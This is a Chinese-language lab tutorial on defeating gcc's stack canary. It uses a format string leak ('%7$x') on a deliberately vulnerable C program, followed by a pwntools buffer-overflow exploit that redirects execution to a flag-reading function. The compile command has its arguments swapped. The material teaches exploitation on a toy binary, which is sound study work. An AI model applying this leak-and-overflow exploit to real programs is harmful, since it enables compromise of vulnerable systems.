通过格式化字符串漏洞绕过canary

1.1    canary内存保护机制

1.1.1    canary工作原理

canary保护机制类似于/GS保护机制，是Linux下gcc编译器的安全保护机制之一，在栈中的结构如下图所示：

 

在函数初始化的时候回初始化一个随机的canary值置于缓冲区的末端，在函数返回之前会对canary的值进行验证，无误则正常返回。

 

1.1.2    通过格式化字符串漏洞绕过canary

⑴．原理分析：

因为通过格式化字符串漏洞可以实现任意内存的读写，而且，在一个程序里，不同函数在运行中使用的canary值是相同的，所以可以通过对格式化字符串漏洞的利用，将canary的值读出来，实现缓冲区溢出攻击后（控制RET地址），在函数退出验证前再将canary 的值填回栈中，通过验证实现函数的正常返回。

⑵．环境准备：

 i．存在格式化字符串漏洞的程序：                    

#include <stdio.h>

#include <unistd.h>

void getflag(void) {

    char flag[100];

    FILE *fp = fopen("./flag", "r");

    if (fp == NULL) {

        puts("get flag error");

    }

    fgets(flag, 100, fp);

    puts(flag);

}

void init() {

    setbuf(stdin, NULL);

    setbuf(stdout, NULL);

    setbuf(stderr, NULL);

}

void fun(void) {

         char buffer[100];

         read(STDIN_FILENO, buffer, 120);

}

int main(void) {

         char buffer[6];

         init();

         scanf("%6s",buffer);

         printf(buffer);

         fun();

}

 

ii．测试环境：

 测试平台linux debian 7

攻击脚本编写模块：pwntools。

辅助调试插件：gdb-peda

 iii. 编译命令：

gcc -m32 -g -z execstack -fstack-protector-all -o print_canary.c print_canary

 

⑶．调试分析：

 i. 查看保护机制：

                 

可以看到只有canary保护机制是成立的。

                  

ii．找到存在缓冲区溢出漏洞的函数的canary值地址：

可以看到位于canary的值位于[ebp-0xc]=0xffffd27c处，

 

 iii. 找到缓冲区起始地址：

 

参数arg[1]的值为缓冲区的起始地址：0xffffd218。

 

iv．确定返回地址指针：

 

返回地址位于：0xffffd28c。

 

 

⑷．攻击过程：

i．攻击思路：

我们的目的通过格式化字符串漏洞得到canary值，在实现缓冲区溢出攻击后控制fun函数的返回地址，执行getflag函数读取当前目录下的flag文件，在溢出的时候要将得到canary值准确的填入它原来的位置。

 

ii．得到getflag函数的地址：

 

Getflags函数地址为：0x5655572d。

 

iii．计算缓冲区大小;

由上面的调试分析可知：

缓冲区大小等于缓冲区结束的地址0xffffd27c - 0xffffd218 = 100（字节）。

 

iv．分析栈使用情况：

 

v．编写攻击脚本实现攻击：

from pwn import *

context.log_level = 'debug'

cn = process('./print_canary')

cn.sendline('%7$x')

canary = int(cn.recv(),16)

print hex(canary)

cn.send('a'*100 + p32(canary) + 'a'*12 + p32(0x5655572d))

flag = cn.recv()

log.success('flag is:' + flag)

 

攻击结果：

 

成功。